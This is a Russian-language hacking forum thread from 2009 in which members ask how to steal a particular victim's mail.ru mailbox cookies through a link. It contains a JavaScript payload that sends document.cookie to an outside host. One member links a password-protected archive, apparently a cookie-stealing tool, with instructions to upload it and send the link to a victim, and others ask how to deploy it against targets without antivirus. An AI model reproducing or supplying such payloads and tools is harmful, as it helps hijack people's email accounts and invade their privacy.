Кража куки через клик по ссылке

Discussion in 'Уязвимости Mail-сервисов' started by LemoTTT, 4 May 2009.

  1. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
    HTML:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
    ЗЫ: пишем те, кто уже точно знает!
     
  2. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    В общем случае куки можно получить только в рамках одного домена.
     
    _________________________
  3. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!
     
  4. pento

    pento Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    126
    Likes Received:
    24
    Reputations:
    -1
    не будут
     
  5. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!
     
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Ты, видимо, не понимаешь, что куки без xss не своруешь.
     
  7. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
    ЗЫ брут бредддддддд!
     
  8. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Бред говоришь ты.
    У тебя есть колеса - этот скрипт. Но нет двигателя XSS
    Как ты без двигателя толкнешь колеса?
    Да никак.
    Xss и используется, чтобы сookie своровать.
     
  9. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
    Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
    2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!
     
  10. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
    Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
    2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!
     
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Не исключено, что нет.
    Может, не говорят о ней, или еще не нашли?
    Если пытаешься атаковать там, где нет Xss все действия просто бессмыслены)
     
  12. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    а как можно легко добыть куки почт ящика, не посылайте читать темы, просто опишите как делаете это вы!
     
    #12 LemoTTT, 4 May 2009
    Last edited: 4 May 2009
  13. Ice_Burn

    Ice_Burn Member

    Joined:
    10 Feb 2009
    Messages:
    217
    Likes Received:
    26
    Reputations:
    1
    http://mirhtml.narod.ru/kuki_2.rar

    Pass:123

    Редактируешь файл , заливаешь на хост и даёшь линк жертве...
    И те на хост приходит файл с куками ...

    Тестировалось на Windows sp2
     
    1 person likes this.
  14. Digital111

    Digital111 Member

    Joined:
    9 Feb 2009
    Messages:
    7
    Likes Received:
    90
    Reputations:
    0
    Ice_Burn, скажи еще как именно залить? Narod.ru подойдет? Какую ссылку нужно давать? И куда прийдут куки?
     
    4 people like this.
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99

    закончи школу, утройся на работу и забудешь про xss...
     
    2 people like this.
  16. Denssss

    Denssss New Member

    Joined:
    25 Oct 2008
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Буду проверять :) гыыы ну естесно у лоха никаих антивиров не должно быть ?
     
  17. Player#1

    Player#1 Member

    Joined:
    11 Nov 2008
    Messages:
    95
    Likes Received:
    35
    Reputations:
    10
    ТС задолбал создавать тупые темы !!! где модераторы???

    http://forum.antichat.ru/thread118782.html
    http://forum.antichat.ru/thread118777.html

    нельзя же быть настолько тупым.. читай форум и не задавай тупых вопросов.
     
  18. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    слушай, я задаю эти вопросы и людя интересно, которые тоже заинтересованы в помоще, а ты такой же новичек как и я, и кричиш тут на весь форум "Где модераторы..." воображая из себя какого то перца!
    ЗЫ: кто то тестил способ от Ice_Burn
     
  19. Player#1

    Player#1 Member

    Joined:
    11 Nov 2008
    Messages:
    95
    Likes Received:
    35
    Reputations:
    10
    Не хочу оффтопить, но воображаешь из себя только ты и причем не "какого то перца", а какого-то неадыкватного человека.. зачем создавать 3 одинаковых темы и обсуждать в них вопрос который понятен ЛЮБОМУ кто хоть чуть-чуть шарит в IT... а ты если не шаришь, то попытайся хотя бы полистать форум, начни с этой темы: http://forum.antichat.ru/thread20140.html
    з.ы. мой статус новичка ни о чем не говорит...
     
    1 person likes this.
  20. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    я читал, ну ты пойми, ну это же почти нериал искать ети xss, вот возьмем mail.ru, при регистрации пару полей и я проверял нет там xss? где еще можно искать? на "Мой мир" такая же история, естих полей мало для заолнения и коментов ГДЕ там чтот о можно найти, БРЕД!